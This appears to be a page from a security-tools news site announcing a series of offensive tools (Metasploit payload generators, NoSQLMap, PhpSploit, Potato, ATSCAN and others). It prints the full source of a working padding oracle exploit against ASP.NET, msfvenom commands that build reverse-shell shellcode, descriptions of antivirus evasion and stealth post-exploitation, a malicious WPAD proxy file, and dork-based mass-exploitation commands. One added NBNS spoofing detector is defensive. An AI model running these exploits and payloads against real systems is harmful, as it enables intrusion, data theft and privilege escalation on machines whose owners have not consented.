Channel: Exploits – Security List Network™

Msfvenom Payload Creator (MPC) v-1.4.1.


Changelog v1.4.1: Supports non-root users & non-English OSs.

MPC-v1-4-1: quick way to generate various "basic" Meterpreter payloads via msfvenom (part of the Metasploit framework).

Msfvenom Payload Creator (MPC) is a wrapper that generates multiple types of payloads based on the user's choice. The idea is to be as simple as possible (requiring only one input) to produce the payload.

Fully automating msfvenom & Metasploit is the end goal (as well as being able to automate MPC itself). The rest is about making the user's life as easy as possible (e.g. IP selection menu, msfconsole resource file/commands, batch payload production, and accepting any argument in any order and in various formats/patterns).

The only necessary input from the user should be defining the payload they want, by either the platform (e.g. windows) or the file extension they wish the payload to have (e.g. exe).
+ Can't remember your IP for an interface? Don't sweat it, just use the interface name: eth0.
+ Don't know what your external IP is? MPC will discover it: wan.
+ Want to generate one of each payload? No issue! Try: loop.
+ Want to mass create payloads? Everything? Or to filter your selection? Either way, it's not a problem. Try: batch (for everything), batch msf (for every Meterpreter option), batch staged (for every staged payload), or batch cmd stageless (for every stageless command prompt)!

Note: This will NOT try to bypass any anti-virus solutions at any stage.
Install
+ Designed for Kali Linux v2.x & Metasploit v4.11+.
+ Kali v1.x should work.
+ OSX 10.11+ should work.
+ Weakerth4n 6+ should work.
+ …nothing else has been tested.

Installation using git:

git clone https://github.com/g0tmi1k/mpc && cd mpc
./mpc.sh

Update:
cd mpc
git pull

Download : v1.4.1.zip  | v1.4.1.tar.gz
Source : https://github.com/g0tmi1k
Our Post Before : http://seclist.us/msfvenom-payload-creator-mpc-v-1-4-released.html


Updates NoSQLMap – Automated Mongo database and NoSQL web application exploitation tool.


Latest Change 11/1/2016:
+ nosqlmap.py : Fixed crash setting options.

NoSQLMap is an open source Python tool designed to audit for, as well as automate, injection attacks and exploit default configuration weaknesses in NoSQL databases and in web applications using NoSQL, in order to disclose data from the database.
It is named as a tribute to Bernardo Damele and Miroslav Stampar's popular SQL injection tool sqlmap, and its concepts are based on and extend Ming Chow's excellent presentation at DEF CON 21, "Abusing NoSQL Databases". Presently the tool's exploits are focused on MongoDB, but support for other NoSQL platforms such as CouchDB, Redis, and Cassandra is planned for future releases.

NoSQLMap-v0-5


Requirements
On a Debian or Red Hat based system, the setup.sh script may be run as root to automate the installation of NoSQLMap’s dependencies.
Varies based on features used:
+ Metasploit Framework
+ MongoDB
+ Python with PyMongo
+ httplib2
+ urllib

Features:
– Automated MongoDB and CouchDB database enumeration and cloning attacks.
– Extraction of database names, users, and password hashes through MongoDB web applications.
– Scanning subnets or IP lists for MongoDB and CouchDB databases with default access and enumerating versions.
– Dictionary and brute force password cracking of recovered MongoDB and CouchDB hashes.
– PHP application parameter injection attacks against MongoClient to return all database records.
– Javascript function variable escaping and arbitrary code injection to return all database records.
– Timing based attacks similar to blind SQL injection to validate Javascript injection vulnerabilities with no feedback from the application.

Installation using git:

git clone https://github.com/tcstool/NoSQLMap && cd NoSQLMap
python setup.py

Debian/Ubuntu/Kali:
Make sure all dependencies have been installed, such as the Metasploit Framework & MongoDB.
apt-get install mongodb (make sure you have root privileges)
sudo apt-get install python-pbkdf2 (don't use pip; it errors because of the letter case in PBKDF2)
sudo apt-get install python-httplib2
sudo apt-get install python-ipcalc
sudo apt-get install python-CouchDB
then run
./nosqlmap.py

Update
cd NoSQLMap
git pull

Source : http://www.nosqlmap.net | Our post Before

crisp.sh v1.0.7 – msfvenom shellcode generator/compiler/listener.


[ DISCLAIMER ]
The author does not hold any responsibility for the bad use of this script; remember that attacking targets without prior consent is illegal and punishable by law.

The script uses msfvenom (Metasploit) to generate shellcode in different formats (c | python | ruby | dll | msi | hta-psh), injects the generated shellcode into one function (example: python, where "the python function will execute the shellcode in RAM"), and uses compilers like gcc (GNU cross compiler), mingw32 or pyinstaller to build the executable file; it also starts a multi-handler to receive the remote connection (reverse shell or Meterpreter session).

The 'shellcode generator' tool reproduces some of the techniques used by the Veil-Evasion framework, unicorn.py, PowerSploit, etc. "P.S. some payloads are undetectable by AV solutions, yes!!!" One of the reasons for that is the use of a function to execute the 2nd stage of shell/meterpreter directly in the target's RAM.

CRISP.SH 1.0.7 - metasploit shellcode generator/compiler/listener (this script has been tested on Kali 2.0, Ubuntu 14.04, Arch Linux, FreeBSD, Redhat, Centos, Fedora and Mac OSX)

DEPENDENCIES :
— “crisp.sh will download/install all dependencies as they are needed”
— Zenity | Metasploit | GCC (compiler) | Pyinstaller (python-to-exe module)
— python-pip (pyinstaller downloader) | mingw32 (compiles .EXE executables)

Features:
option – build – target – format – output

1 – shellcode – unix – C – C
2 – shellcode – windows – C – DLL
3 – shellcode – windows – DLL – DLL
4 – shellcode – windows – PYTHON – PYTHON/EXE
5 – shellcode – windows – C – EXE
6 – shellcode – windows – MSIEXEC – MSI
7 – shellcode – windows – RUBY – RUBY
8 – shellcode – windows – HTA-PSH – HTA
9 – shellcode – webserver – PHP – PHP

V – msfvenom exercises console
F – FAQ (frequently asked questions)
R – exit shellcode generator

Usage:

download crisp-shellcode-generator.zip
unzip it
cd
./crisp.sh

Download : crisp-shellcode-generator.zip
Source : http://sourceforge.net/p/crisp-shellcode-generator/

PhpSploit v2.3.0 (in Development) – Stealth post-exploitation framework.


changelog Version 2.3.0 (IN DEVELOPMENT):
+ Fix issue #9 (small bug in api.payload.Payload())
+ lrun command is now able to change PWD (issue #10)
+ Remove deprecated lcd and lpwd commands.
+ Fix some small bugs and documentation misspells.
+ Fix issue #6 (*_proxy env var handling through http tunnel).
+ All settings can now be reset with set <VAR> %%DEFAULT%%
+ Add full backward compatibility with older phpsploit session files.
+ Fix issue #1 (the ls plugin leaves at first invalid path)
+ Fix no existing file in datatypes/Path
+ Fix issue #5 – Add a '--browser' option to phpinfo plugin for html display.

Version 2.2.0b (2014-08-09):
+ Rewritten the whole PhpSploit framework in python 3 with new skeleton.
+ The system command has been renamed to run.
+ Add corectl command, which includes some core debugging utils.
+ TEXTEDITOR setting has been renamed to EDITOR.
+ WEBBROWSER setting has been renamed to BROWSER.
+ The infect command has been removed, its role is now taken by exploit.
+ The new session command now manages the old load and save commands.
+ The set command now supplies a new keyword (“+”) for line appending.
+ Any setting now supports random choice from multiple values, with the new set command's + keyword, which uses the SettingVar class as data wrapper.
+ The eval command has been replaced by source, which is more restrictive.
+ The lastcmd command has been replaced by backlog, which is simpler.
+ The phpsploit source code has moved to ./src/ directory.
+ Plugins path is now available at root directory.
+ User plugins can now overwrite core plugins (~/.phpsploit/plugins/)

PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable of maintaining access to a compromised web server for privilege escalation purposes.

Features :
Efficient: More than 20 plugins to automate post-exploitation tasks
+ Run commands and browse filesystem, bypassing PHP security restrictions
+ Upload/Download files between client and target
+ Edit remote files through local text editor
+ Run SQL console on target system
+ Spawn reverse TCP shells

Stealth: The framework is made by paranoids, for paranoids
+ Nearly invisible by log analysis and NIDS signature detection
+ Safe-mode and common PHP security restrictions bypass
+ Communications are hidden in HTTP Headers
+ Loaded payloads are obfuscated to bypass NIDS
+ http/https/socks4/socks5 Proxy support

Convenient: A robust interface with many crucial features
+ Cross-platform on both the client and the server.
+ Powerful interface with completion and multi-command support
+ Session saving/loading feature, with persistent history
+ Multi-request support for large payloads (such as uploads)
+ Provides a powerful, highly configurable settings engine
+ Each setting, such as user-agent, has a polymorphic mode
+ Customisable environment variables for plugin interaction
+ Provides a complete plugin development API

Installation & usage:

git clone https://github.com/nil0x42/phpsploit && cd phpsploit
./phpsploit

Updates
cd phpsploit
git pull

Download : master.zip  | or Git Clone | Our Post Before
Source : https://github.com/nil0x42

Padding oracle attack against ASP.NET


An exploit for the padding oracle attack. Tested against ASP.NET, works like a charm. The CBC mode must use PKCS7 for the padding block. This is an implementation of the great article Padding Oracle Attack; I advise you to read it if you want to understand the basics of the attack. This exploit allows a block size of 8 or 16, which means it can be used whether the cipher is AES or DES.

example-usage


Usage:

git clone https://github.com/mpgn/Padding-oracle-attack && cd Padding-oracle-attack
python exploit.py -h (prints the full help)

exploit.py Script:

#!/usr/bin/env python2
# -*- coding: utf-8 -*-

'''
    Padding Oracle Attack implementation of this article https://not.burntout.org/blog/Padding_Oracle_Attack/
    Author: mpgn <martial.puygrenier@gmail.com>
    Date: 2016
'''

import argparse
import httplib
import urllib
import re
import sys
from binascii import unhexlify, hexlify
from itertools import cycle

####################################
# CUSTOM YOUR RESPONSE ORACLE HERE #
####################################
''' the function to change to adapt the oracle to your target:
    returns 1 when the response means "padding OK", 0 otherwise '''
def test_validity(response, error):
    # --error given as a number: compare it with the HTTP status code only
    try:
        value = int(error)
        return 1 if int(response.status) == value else 0
    except ValueError:
        pass  # it was a string, not an int: look for it in the body instead

    # --error given as a string: padding is valid when the text is absent from the DOM
    data = response.read()
    if data.find(error) == -1:
        return 1
    return 0

################################
# CUSTOM YOUR ORACLE HTTP HERE #
################################
''' turn the --post string "'user':'value', 'pass':'value'" into a dict '''
def parse_post_data(post):
    data = {}
    for pair in post.split(','):
        key, value = pair.split(':', 1)
        data[key.strip().strip("'\"")] = value.strip().strip("'\"")
    return data

def call_oracle(host, cookie, url, post, method, up_cipher):
    params = urllib.urlencode(parse_post_data(post)) if post else ''
    headers = {"Content-type": "application/x-www-form-urlencoded",
               "Accept": "text/plain",
               "Cookie": cookie}
    conn = httplib.HTTPConnection(host)
    # the forged ciphertext (hex) is appended to the URL given with -u
    conn.request(method, url + up_cipher, params, headers)
    response = conn.getresponse()
    return conn, response

# the exploit doesn't need to touch this part
''' split the cipher into chunks of len_block hex characters '''
def split_len(seq, length):
    return [seq[i:i+length] for i in range(0, len(seq), length)]

''' create the custom block for the byte we search: zeros, the guessed byte, then the bytes already found '''
def block_search_byte(size_block, i, pos, l):
    hex_char = hex(pos).split('0x')[1]
    return "00"*(size_block-(i+1)) + ("0" if len(hex_char)%2 != 0 else '') + hex_char + ''.join(l)

''' create the custom block for the padding: zeros followed by (i+1) bytes of value i+1 '''
def block_padding(size_block, i):
    l = []
    for t in range(0, i+1):
        l.append(("0" if len(hex(i+1).split('0x')[1])%2 != 0 else '') + (hex(i+1).split('0x')[1]))
    return "00"*(size_block-(i+1)) + ''.join(l)

''' xor two hex strings (the second one is cycled if shorter) and return the result as hex '''
def hex_xor(s1, s2):
    return hexlify(''.join(chr(ord(c1) ^ ord(c2)) for c1, c2 in zip(unhexlify(s1), cycle(unhexlify(s2)))))

def run(cipher, size_block, host, url, cookie, method, post, iv, error, verbose=False):
    found        = False
    valide_value = []
    result       = []
    len_block    = size_block*2
    cipher_block = split_len(cipher, len_block)

    if iv != '':
        cipher_block.insert(0, iv)

    if len(cipher_block) == 1 and iv == '':
        print "[-] Abort there is only one block but no IV"
        sys.exit()
    # for each cipher block, starting from the last one
    for block in reversed(range(1, len(cipher_block))):
        if len(cipher_block[block]) != len_block:
            print "[-] Abort length block doesn't match the size_block"
            break
        print "[+] Search value block : ", block
        # for each byte of the block
        for i in range(0, size_block):
            # test each byte max 255
            for ct_pos in range(0, 256):
                # guessing ct_pos == i+1 leaves that byte of C_{i-1} unchanged (x xor x = 0),
                # so skip it unless it is the padding value we already know is valid
                if ct_pos != i+1 or (len(valide_value) > 0 and int(valide_value[len(valide_value)-1], 16) == ct_pos):

                    bk = block_search_byte(size_block, i, ct_pos, valide_value)
                    bp = cipher_block[block-1]
                    bc = block_padding(size_block, i)
                    if verbose:
                        print "[+] Block M_Byte : %s" % bk
                        print "[+] Block C_{i-1}: %s" % bp
                        print "[+] Block Padding: %s" % bc

                    tmp = hex_xor(bk, bp)
                    cb  = hex_xor(tmp, bc).upper()

                    up_cipher = cb + cipher_block[block]
                    print "[+] Test [Byte ", '%02i' % ct_pos, "/256 - Block", block, "]: ", up_cipher
                    if verbose:
                        print ''

                    # we call the oracle, our god
                    connection, response = call_oracle(host, cookie, url, post, method, up_cipher)
                    if verbose:
                        print "[+] HTTP ", response.status, response.reason

                    if test_validity(response, error):
                        found = True
                        connection.close()

                        # data analyse: keep the byte we just guessed
                        value = re.findall('..', bk)
                        valide_value.insert(0, value[size_block-(i+1)])
                        print "[+] Found", i+1, "bytes :", ''.join(valide_value)
                        print ''

                        # move on to the next byte of the block
                        break
                    connection.close()
            if found == False:
                print "[-] Error decryption failed"
                sys.exit()
            found = False

        result.insert(0, ''.join(valide_value))
        valide_value = []

    print ''
    hex_r = ''.join(result)
    print "[+] Decrypted value (HEX):", hex_r.upper()
    padding = int(hex_r[len(hex_r)-2:len(hex_r)], 16)
    print "[+] Decrypted value (ASCII):", hex_r[0:-(padding*2)].decode("hex")

if __name__ == '__main__':

    parser = argparse.ArgumentParser(description='Padding oracle attack PoC')
    parser.add_argument('-c', "--cipher",               required=True,              help='cipher you want to decrypt (hex)')
    parser.add_argument('-l', '--length_block_cipher',  required=True, type=int,    help='length of a cipher block: 8 or 16')
    parser.add_argument("--host",                       required=True,              help='target host, example: www.example.com')
    parser.add_argument('-u', "--urltarget",            required=True,              help='url example: /page=')
    parser.add_argument('--error',                      required=True,              help='Error that the oracle gives us, example: 404,500,200 OR in the dom, example: "<h2>Padding Error<h2>"')
    parser.add_argument('--iv',             help='IV of the CBC cipher mode',       default="")
    parser.add_argument('--cookie',         help='Cookie example: PHPSESSID=9nnvje7p90b507shfmb94d7',   default="")
    parser.add_argument('--method',         help='HTTP method like POST or GET, default GET',           default="GET")
    parser.add_argument('--post',           help="POST data example: 'user':'value', 'pass':'value'",    default="")
    parser.add_argument('-v', "--verbose",  help='debug mode, you need a large screen', action="store_true")
    args = parser.parse_args()

    run(args.cipher, args.length_block_cipher, args.host, args.urltarget, args.cookie, args.method, args.post, args.iv, args.error, args.verbose)

Source : https://github.com/mpgn

EaST v0.9.6 – Exploits and Security Tools Framework.


Changelog v0.9.6:
+ java serialization added.
+ Prints an error to the console if a module can't be loaded.
– fix: Resizing width of controls with resizing width of run module dialog
– fix: Code editor loads immediately
– fix: Download link now works.

This software is intended for learning and improving skills and knowledge of attacks on information systems, and for conducting audits and proactive protection. The need to develop a domestic pentest framework (accessible, affordable, high-confidence) is long overdue. Therefore the EAST framework was created for the domestic (as well as friendly) information security markets. EAST is a framework that has in its arsenal all the necessary tools to exploit a broad range of vulnerabilities, from web to buffer overflow. Compared with other similar tools, EAST is simple and easy to use. Even a novice researcher can master it and begin to develop in the field of information security!

east-v0-9-6


Main characteristics:
+ Security framework! Software used for information security must enjoy a high level of user confidence. EAST is implemented as open, easily verifiable Python source code, used for all components of the framework and its modules. The relatively small amount of code makes verification by any user simple. During installation no changes are made to the OS.
+ Maximum simplicity of the framework. Download the archive and run the main Python script start.py, which implements starting/stopping exploits, messaging, etc. All management is done locally or remotely through a browser.
+ Easy to create and edit. Modules and exploits can be edited and added "on the fly" without restarting. Module body code is simple and minimal in volume.
+ Cross-platform, with minimum requirements and dependencies. Tested on Windows and Linux; it should work wherever there is Python. The framework contains all its dependencies and "pulls" external libraries.
+ Full functionality of a classic pentest framework! Despite its simplicity and lack of bloat, it has in its arsenal all the necessary means to exploit a broad range of vulnerabilities, from web to buffer overflow.
+ Great opportunities for extension. Server-client architecture, an API for messaging, and support libraries allow third-party developers to create their own open-source solutions or participate in the development of EAST.

east-cli


Exploit list:
+ ef_bitdefender_gravityzone_dt.py Directory traversal
+ ef_cogento_datahub_afd.py Arbitrary File Download
+ ef_e_detective_afd.py Arbitrary File Download
+ ef_easyfile_webserver_sbo.py Stack Buffer Overflow
+ ef_fhfs_rce.py Remote Command Execution
+ ef_joomla_gallery_wd_bsqli.py Blind SQL Injection
+ ef_solarwinds_log_and_event_manager_rce.py Remote Command Execution
+ ef_symantec_pcanywhere_host_rce.py Remote Command Execution
+ ef_wincc_miniweb_dos.py Denial of Service
+ ef_winrar_rce.py Remote Command Execution
+ port_scanner.py Tools

Installation and Usage:

git clone https://github.com/C0reL0ader/EaST && cd EaST
python start.py
then open your favorite browser for the GUI.

Updates:
cd EaST
git pull

Source: https://github.com/C0reL0ader & http://eastfw.com/  | Our Post Before

Foolav – Pentest tool for antivirus evasion and running arbitrary payload on target Wintel host.


An executable compiled from this code is useful during penetration tests where there is a need to execute some payload (Meterpreter, maybe?) while being certain that it will not be detected by antivirus software. The only requirement is to be able to upload two files, the binary executable and the payload file, into the same directory.
The x86 binary will run on both x86 and x86_64 Windows systems. When the payload is a Meterpreter, you should have no issues migrating from x86 Meterpreter to x86_64 processes.

Usage steps:
1. prepare a one-line payload (x86), e.g.:

msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d\xff" -f c 2>/dev/null | egrep "^\"" | tr -d "\"\n;" ; echo

2. save it as [executable-name-without-exe-extension].mf in the same directory as the executable. Payload running calc.exe, generated using the above command:


3. once the executable is run, the payload will be parsed, loaded into a separate thread and executed in memory:

calc-foolav


Download : foolav.zip(55 KB)
Source : https://github.com/hvqzao

Potato – Windows privilege escalation through NTLM Relay and NBNS Spoofing.


How does it work?
Potato takes advantage of known issues in Windows to gain local privilege escalation, namely NTLM relay (specifically HTTP->SMB relay) and NBNS spoofing. Using the techniques outlined below, it is possible for an unprivileged user to gain "NT AUTHORITY\SYSTEM" level access to a Windows host in default configurations.
The exploit consists of 3 main parts, all of which are somewhat configurable through command-line switches:

Potato - Privilege Escalation on Windows 7,8,10, Server 2008, Server 2012


1. Local NBNS Spoofer
NBNS is a broadcast UDP protocol for name resolution commonly used in Windows environments. In penetration testing, we often sniff network traffic and respond to NBNS queries observed on a local network. For privilege escalation purposes, we can’t assume that we are able to sniff network traffic, so how can we accomplish NBNS spoofing?
If we know ahead of time which host a target machine (in this case our target is 127.0.0.1) will send an NBNS query for, we can craft a response and flood the target host with NBNS responses (since it is a UDP protocol). One complication is that a 2-byte field in the NBNS packet, the TXID, must match in the request and response. We can overcome this by flooding quickly and iterating over all 65536 possible values.
In testing, this has proved to be 100% effective.

2. Fake WPAD Proxy Server
With the ability to spoof NBNS responses, we can target our NBNS spoofer at 127.0.0.1. We flood the target machine (our own machine) with NBNS response packets for the host “WPAD”, or “WPAD.DOMAIN.TLD”, and we say that the WPAD host has IP address 127.0.0.1.
At the same time, we run an HTTP server locally on 127.0.0.1. When it receives a request for “http://wpad/wpad.dat”, it responds with something like the following:

function FindProxyForURL(url, host) {
    // keep requests for "localhost" direct; everything else goes through the local proxy
    if (dnsDomainIs(host, "localhost")) return "DIRECT";
    return "PROXY 127.0.0.1:80";
}

This will cause all HTTP traffic on the target to be redirected through our server running on 127.0.0.1.
Interestingly, this attack when performed by even a low privilege user will affect all users of the machine. This includes administrators, and system accounts. See the screenshots “egoldstein_spoofing.png” and “dade_spoofed.png” for an example.

3. HTTP -> SMB NTLM Relay
With all HTTP traffic now flowing through a server that we control, we can do things like request NTLM authentication…
In the Potato exploit, all requests are redirected with a 302 redirect to “http://localhost/GETHASHESxxxxx”, where xxxxx is some unique identifier. Requests to “http://localhost/GETHASHESxxxxx” respond with a 401 request for NTLM authentication.
The NTLM credentials are relayed to the local SMB listener to create a new system service that runs a user-defined command. This command will run with “NT AUTHORITY\SYSTEM” privilege.

Mitigations:
Enabling “Extended Protection for Authentication” in Windows should stop NTLM relay attacks.
SMB Signing may also mitigate this type of attack, however this would require some more research on my part to confirm.

Off Broadcast NBNS Spoofing
Using the same NBNS spoofing technique as the Potato exploit, we can perform NBNS spoofing against any host for which we can talk to UDP 137. We simply need to send UDP packets quickly enough to sneak in a valid reply before the NBNS request times out.
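From the defender's side, the TXID brute force and the WPAD-to-loopback answer described above leave a recognisable pattern in UDP/137 traffic. The following is an added example (not part of the Potato release) that parses NBNS positive name query responses and flags both; the packet builder, the source address 10.0.0.5, the 64-response threshold and the sample capture are assumptions constructed for the demonstration.

```python
import struct
from collections import defaultdict

FLAG_RESPONSE = 0x8000   # R bit of the NBNS header flags (RFC 1002)
TYPE_NB = 0x0020         # NB resource record: NetBIOS name -> IPv4 address


def encode_nbns_name(name, suffix=0x00):
    """First-level encoding: pad the name to 15 chars, append the suffix byte, then
    write every byte as two nibbles offset by 'A' ("WPAD" starts "FHFAEBEE", the
    space padding becomes "CA" pairs)."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    enc = "".join(chr((b >> 4) + 0x41) + chr((b & 0x0F) + 0x41) for b in raw)
    return b"\x20" + enc.encode("ascii") + b"\x00"


def decode_nbns_name(buf, off):
    """Inverse of encode_nbns_name; returns (name, suffix, offset_after_name)."""
    if buf[off] != 32:
        raise ValueError("unexpected NetBIOS name length")
    enc = buf[off + 1:off + 33]
    raw = bytes(((enc[i] - 0x41) << 4) | (enc[i + 1] - 0x41) for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(), raw[15], off + 34


def build_nbns_response(txid, name, ip, ttl=300):
    """Positive name query response (RFC 1002 4.2.13). Used here only to construct
    sample traffic for the detector (assumption: one address per answer)."""
    header = struct.pack("!6H", txid, 0x8500, 0, 1, 0, 0)
    rdata = struct.pack("!H4B", 0x0000, *(int(o) for o in ip.split(".")))
    rr = struct.pack("!HHIH", TYPE_NB, 0x0001, ttl, len(rdata))
    return header + encode_nbns_name(name) + rr + rdata


def parse_nbns_response(buf):
    """Return {'txid', 'name', 'suffix', 'addrs'} for a name query response, or None
    for queries, other record types and truncated packets."""
    try:
        if len(buf) < 12:
            return None
        txid, flags, _qd, an, _ns, _ar = struct.unpack("!6H", buf[:12])
        if not (flags & FLAG_RESPONSE) or an == 0:
            return None
        name, suffix, off = decode_nbns_name(buf, 12)
        rr_type, _cls, _ttl, rdlen = struct.unpack("!HHIH", buf[off:off + 10])
        off += 10
        if rr_type != TYPE_NB:
            return None
        addrs = []
        for i in range(0, rdlen, 6):
            _nb_flags, a, b, c, d = struct.unpack("!H4B", buf[off + i:off + i + 6])
            addrs.append("%d.%d.%d.%d" % (a, b, c, d))
        return {"txid": txid, "name": name, "suffix": suffix, "addrs": addrs}
    except (ValueError, IndexError, struct.error):
        return None


def detect_nbns_spoofing(packets, window=1.0, threshold=64):
    """packets: iterable of (timestamp_seconds, src_ip, udp_payload) for port 137.
    Returns a sorted list of (kind, src_ip, name) findings:
      txid_flood    - at least `threshold` distinct TXIDs for one name from one source
                      within `window` seconds (a real responder answers a query once,
                      with the one TXID it was asked with)
      wpad_loopback - an answer that resolves WPAD to 127.0.0.0/8, i.e. the fake
                      proxy setup described in step 2"""
    seen = defaultdict(list)
    findings = set()
    for ts, src, payload in packets:
        rec = parse_nbns_response(payload)
        if rec is None:
            continue
        seen[(src, rec["name"])].append((ts, rec["txid"]))
        if rec["name"] == "WPAD" and any(a.startswith("127.") for a in rec["addrs"]):
            findings.add(("wpad_loopback", src, "WPAD"))
    for (src, name), events in seen.items():
        events.sort()
        start = 0
        for end in range(len(events)):        # sliding window over the timeline
            while events[end][0] - events[start][0] > window:
                start += 1
            if len({tx for _, tx in events[start:end + 1]}) >= threshold:
                findings.add(("txid_flood", src, name))
                break
    return sorted(findings)


def sample_capture():
    """Constructed traffic: one benign answer, one plain query (not a response), and a
    200-packet TXID sweep for WPAD pointing at loopback, all within 0.2 seconds."""
    pkts = [(0.0, "10.0.0.9", build_nbns_response(0x1234, "FILESRV", "10.0.0.9"))]
    query = struct.pack("!6H", 0x4321, 0x0110, 1, 0, 0, 0) + encode_nbns_name("WPAD") \
        + struct.pack("!HH", TYPE_NB, 0x0001)
    pkts.append((0.1, "10.0.0.9", query))
    pkts += [(0.2 + i * 0.001, "10.0.0.5", build_nbns_response(i, "WPAD", "127.0.0.1"))
             for i in range(200)]
    return pkts


if __name__ == "__main__":
    for finding in detect_nbns_spoofing(sample_capture()):
        print(finding)
```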

Download : potato-master.zip https://github.com/breenmachine/Potato/archive/master.zip
Source : https://github.com/breenmachine


venom.sh v1.0.8 stable released – msfvenom shellcode generator/compiler/listener.


[ DISCLAIMER ]
The author does not hold any responsibility for the bad use of this script; remember that attacking targets without prior consent is illegal and punishable by law.

Latest change v1.0.8:
+ Biprodeep python execution example
+ 0entropy powershell
+ output folder fix
+ misspelling fixes

The script uses msfvenom (Metasploit) to generate shellcode in different formats (c | python | ruby | dll | msi | hta-psh), injects the generated shellcode into one function (example: python, where "the python function will execute the shellcode in RAM"), and uses compilers like gcc (GNU cross compiler), mingw32 or pyinstaller to build the executable file; it also starts a multi-handler to receive the remote connection (reverse shell or Meterpreter session).

The 'shellcode generator' tool reproduces some of the techniques used by the Veil-Evasion framework, unicorn.py, PowerSploit, etc. "P.S. some payloads are undetectable by AV solutions, yes!!!" One of the reasons for that is the use of a function to execute the 2nd stage of shell/meterpreter directly in the target's RAM.

venom.sh v1.0.8


DEPENDENCIES :
— “crisp.sh will download/install all dependencies as they are needed”
— Zenity | Metasploit | GCC (compiler) | Pyinstaller (python-to-exe module)
— python-pip (pyinstaller downloader) | mingw32 (compile .EXE executables)
— pyherion.py (crypter) | PEScrambler.exe (PE obfuscator/scrambler.)

Features:
option – build – target – format – output

1 – shellcode – unix – C – C
2 – shellcode – windows – C – DLL
3 – shellcode – windows – DLL – DLL
4 – shellcode – windows – PYTHON – PYTHON/EXE
5 – shellcode – windows – C – EXE
6 – shellcode – windows – MSIEXEC – MSI
7 – shellcode – windows – RUBY – RUBY
8 – shellcode – windows – HTA-PSH – HTA
9 – shellcode – webserver – PHP – PHP

V – msfvenom exercises console
F – FAQ (frequently asked questions)
R – exit shellcode generator

Usage:

git clone git://git.code.sf.net/p/crisp-shellcode-generator/shell crisp-shellcode-generator-shell
cd crisp-shellcode-generator-shell
./venom.sh

Updates:
cd crisp-shellcode-generator-shell
git pull

[ HOW DOES MSFVENOM ACTUALLY BUILD SHELLCODE? ]
The default way to generate a Windows binary payload (.exe) using msfvenom is through the -f flag (output format):
msfvenom -p payload-name LHOST=127.0.0.1 LPORT=666 -f exe -o payload.exe

But msfvenom allows us to build shellcode in different formats,
like: asp, aspx, aspx-exe, dll, elf, exe, exe-small, hta-psh,
macho, osx-app, psh, vba, vba-exe, vba-psh, vbs, bash, c,
java, perl, powershell, python, ruby, sh, vbscript.
The complete list can be accessed using the following command: sudo msfvenom --help-formats

Now let's generate a simple shellcode for windows/shell/reverse_tcp,
choosing powershell as output format. Note that we will not use
the -o flag (save the payload), so the shellcode generated
will only be displayed in the current terminal window.
Using powershell as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f powershell

Using java as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f java

Using hex as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f hex

our post before
Source : http://sourceforge.net/p/crisp-shellcode-generator/

JReFrameworker v1.1.1 – A practical tool for creating Managed Code Rootkits (MCRs) in the Java Runtime Environment.

JREFrameworker

JReFrameworker v1.1.1

Changelog latest version 1.1.1.201601161527:
+ Adding command line options for dropper jar, more reliable output options

JReFrameworker is an Eclipse plugin for creating and building projects that allow the user to write annotated Java source that is automatically merged or inserted into the runtime. The framework supports developing and debugging attack modules directly in the Eclipse IDE. Working at the intended abstraction level of source code allows the attacker to “write once, exploit anywhere”.

Project road map:
+ A payload dropper with support for Metasploit Post-Exploitation Modules
+ Comprehensive review of runtime update strategies (in progress)
+ Support for merging class constructors, initializers, and static initializers
+ Enhanced bytecode validity checks with respect to the entire runtime library (not just the generated class files)
+ Lots of example attack modules!
+ Incremental build support
+ Evaluate attacking other JRE based runtimes (Scala, JRuby, Jython, etc.)

Installing from update site

Follow the steps below to install the JReFrameworker plugin from the Eclipse update site.
1. Start Eclipse, then select Help > Install New Software.
2. Click Add, in the top-right corner.
3. In the Add Repository dialog that appears, enter “JReFrameworker” for the Name and “http://ben-holland.com/JReFrameworker/updates/” for the Location.
4. In the Available Software dialog, select the checkbox next to “WAR Binary Processing” and click Next followed by OK.
5. In the next window, you’ll see a list of the tools to be downloaded. Click Next.
6. Read and accept the license agreements, then click Finish. If you get a security warning saying that the authenticity or validity of the software can’t be established, click OK.
7. When the installation completes, restart Eclipse.

Module:
This extended introductory tutorial demonstrates how to create a simple attack module to hide a file using JReFrameworker and provides a basic understanding of the underlying bytecode manipulations performed by the tool.

Source : https://github.com/benjholla | https://ben-holland.com

ATSCAN v5.0 – perl script for vulnerable Server, Site and dork scanner.


Changelog v5.0:
+ All structure files changed.

Description:
ATSCAN
SEARCH engine
XSS scanner.
Sqlmap.
LFI scanner.
Filter wordpress and Joomla sites in the server.
Find Admin page.
Decode / Encode MD5 + Base64.

Libraries to install:
apt-get install libxml-simple-perl
aptitude install libio-socket-ssl-perl
aptitude install libcrypt-ssleay-perl
NOTE: Works on Linux platforms. Runs best on Ubuntu 14.04, Kali Linux 2.0, Arch Linux, Fedora Linux and CentOS. If you use Windows you can download the libraries manually.

Examples:
Simple search:
Search: --dork [dork] --level [level]
Search + get ip: --dork [dork] --level [level] --ip
Search + get ip + server: --dork [dork] --level [level] --ip --server
Search with many dorks: --dork [dork1,dork2,dork3] --level [level]
Search + get ip+server: --dork [dorks.txt] --level [level]
Search + set save file: --dork [dorks.txt] --level [level] --save myfile.txt
Search + Replace + Exploit: --dork [dorks.txt] --level [level] --replace [string] --with [string] --valid [string]

Subscan from Search Engine:
Search + Exploitation: --dork [dork] --level [10] --xss/--lfi/--wp ...
Search + Server Exploitation: -t [ip] --level [10] --xss/--lfi/--wp ...
Search + Replace + Exploit: --dork [dork] --level [10] --replace [string] --with [string] --exp [exploit] --xss/--lfi/--wp ...

Validation:
Search + Exploit + Validation: --dork [dork] --level [10] --exp --isup/--valid [string]
Search + Server Exploit + Validation: -t [ip] --level [10] --exp --isup/--valid [string]
Search + Replace + Exploit: --dork [dork] --level [10] --replace [string] --with [string] --isup/--valid [string]

Use List / Target:
-t [target/targets.txt] --exp --isup/--valid [string]
